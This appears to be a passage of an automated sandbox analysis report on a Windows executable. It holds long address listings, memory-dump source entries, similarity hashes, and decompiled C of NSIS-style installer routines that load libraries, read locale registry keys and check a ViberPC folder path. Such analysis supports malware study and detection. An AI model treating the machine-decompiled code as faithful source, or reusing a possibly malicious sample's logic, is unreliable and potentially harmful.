                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x00000000
                                                                                                        0x004061ec
                                                                                                        0x00406278
                                                                                                        0x00406181
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040679a
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00000000
                                                                                                        0x0040690d
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                        • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                        • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                        • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                        0x00405e90
                                                                                                        0x00405e93
                                                                                                        0x00405e9a
                                                                                                        0x00405ea2
                                                                                                        0x00405eaf
                                                                                                        0x00000000
                                                                                                        0x00405eb6
                                                                                                        0x00405ea5
                                                                                                        0x00405ead
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405ebe

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 310444273-0
                                                                                                        • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                        • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                        • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                        • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E004036AF() {
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t27;
				int _t30;
				void* _t33;
				struct HINSTANCE__* _t36;
				int _t37;
				int _t41;
				char* _t61;
				CHAR* _t73;
				intOrPtr _t75;
				CHAR* _t80;

				_t75 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t82 = _t20;
				if(_t20 == 0) {
					_t73 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					_push(_t73);
					_push("1033");
					L00405B82();
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t70, _t82);
				_t79 = "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t82, "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons") != 0) {
					L16:
					if(E0040573A(_t90, _t79) == 0) {
						E00405B88(0, _t73, _t75, _t79,  *((intOrPtr*)(_t75 + 0x118))); // executed
					}
					_t27 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t27;
					if( *((intOrPtr*)(_t75 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							E00403978(_t70, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_push(0);
								_t30 = E00404FD6();
								__eflags = _t30;
								if(_t30 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t36 = LoadLibraryA("RichEd20");
							__eflags = _t36;
							if(_t36 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t80 = "RichEdit20A";
							_t37 = GetClassInfoA(0, _t80, 0x423640);
							__eflags = _t37;
							if(_t37 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t80;
								RegisterClassA(0x423640);
							}
							_t41 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t41;
						}
						L22:
						_t33 = 2;
						return _t33;
					} else {
						_t70 =  *0x423ea0;
						 *0x423654 = _t27;
						_v28 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v28;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v24; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v28, 0, 0x80000000, _v24, _v20, _v16 - _v24, _v12 - _v20, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t70 =  *(_t75 + 0x48);
					if(_t70 == 0) {
						goto L16;
					}
					_t73 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t75 + 0x44)), _t70,  *((intOrPtr*)(_t75 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x20
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t73 = 0x422e41;
						_t61 = E00405684(0x422e41, 0x22);
						 *_t61 = 0;
					}
					_push(_t73);
					L00405B7C();
					_t62 = _t61 + _t73 - 4;
					if(_t62 <= _t73) {
						L15:
						E00405B66(_t79, E00405659(_t62, _t73));
						goto L16;
					} else {
						_push(".exe");
						_push(_t62);
						if( *0x4070f0() != 0) {
							goto L15;
						}
						_t62 = GetFileAttributesA(_t73);
						if(_t62 == 0xffffffff) {
							L14:
							_t62 = E004056A0(_t62, _t73);
							goto L15;
						}
						_t90 = _t62 & 0x00000010;
						if((_t62 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}






















                                                                                                        0x004036b5
                                                                                                        0x004036be
                                                                                                        0x004036c5
                                                                                                        0x004036c7
                                                                                                        0x004036db
                                                                                                        0x004036ed
                                                                                                        0x004036f7
                                                                                                        0x004036fc
                                                                                                        0x00403702
                                                                                                        0x00403715
                                                                                                        0x00403715
                                                                                                        0x0040371a
                                                                                                        0x0040371b
                                                                                                        0x00403720
                                                                                                        0x004036c9
                                                                                                        0x004036d4
                                                                                                        0x004036d4
                                                                                                        0x00403725
                                                                                                        0x0040372f
                                                                                                        0x00403738
                                                                                                        0x0040373d
                                                                                                        0x0040374e
                                                                                                        0x004037d5
                                                                                                        0x004037dd
                                                                                                        0x004037e6
                                                                                                        0x004037e6
                                                                                                        0x004037fc
                                                                                                        0x00403802
                                                                                                        0x00403810
                                                                                                        0x0040389f
                                                                                                        0x004038a7
                                                                                                        0x004038b1
                                                                                                        0x004038b6
                                                                                                        0x004038bc
                                                                                                        0x00403945
                                                                                                        0x00403946
                                                                                                        0x0040394b
                                                                                                        0x0040394d
                                                                                                        0x00403969
                                                                                                        0x00000000
                                                                                                        0x00403969
                                                                                                        0x0040394f
                                                                                                        0x00403955
                                                                                                        0x0040395d
                                                                                                        0x0040395d
                                                                                                        0x00000000
                                                                                                        0x00403955
                                                                                                        0x004038ca
                                                                                                        0x004038db
                                                                                                        0x004038dd
                                                                                                        0x004038df
                                                                                                        0x004038e6
                                                                                                        0x004038e6
                                                                                                        0x004038ee
                                                                                                        0x004038f6
                                                                                                        0x004038f8
                                                                                                        0x004038fa
                                                                                                        0x00403903
                                                                                                        0x00403906
                                                                                                        0x0040390c
                                                                                                        0x0040390c
                                                                                                        0x0040392b
                                                                                                        0x0040393c
                                                                                                        0x00000000
                                                                                                        0x00403941
                                                                                                        0x004038a9
                                                                                                        0x004038ab
                                                                                                        0x00000000
                                                                                                        0x00403816
                                                                                                        0x00403816
                                                                                                        0x0040381c
                                                                                                        0x00403826
                                                                                                        0x0040382e
                                                                                                        0x00403838
                                                                                                        0x0040383e
                                                                                                        0x0040384c
                                                                                                        0x0040396e
                                                                                                        0x0040396e
                                                                                                        0x00000000
                                                                                                        0x0040396e
                                                                                                        0x00403852
                                                                                                        0x0040385b
                                                                                                        0x0040389a
                                                                                                        0x00000000
                                                                                                        0x0040389a
                                                                                                        0x00403754
                                                                                                        0x00403754
                                                                                                        0x00403759
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403763
                                                                                                        0x00403773
                                                                                                        0x00403778
                                                                                                        0x0040377f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403783
                                                                                                        0x00403785
                                                                                                        0x0040378d
                                                                                                        0x00403792
                                                                                                        0x00403792
                                                                                                        0x00403794
                                                                                                        0x00403795
                                                                                                        0x0040379a
                                                                                                        0x004037a0
                                                                                                        0x004037c8
                                                                                                        0x004037d0
                                                                                                        0x00000000
                                                                                                        0x004037a2
                                                                                                        0x004037a2
                                                                                                        0x004037a7
                                                                                                        0x004037b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004037b3
                                                                                                        0x004037bc
                                                                                                        0x004037c2
                                                                                                        0x004037c3
                                                                                                        0x00000000
                                                                                                        0x004037c3
                                                                                                        0x004037be
                                                                                                        0x004037c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004037c0
                                                                                                        0x004037a0

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
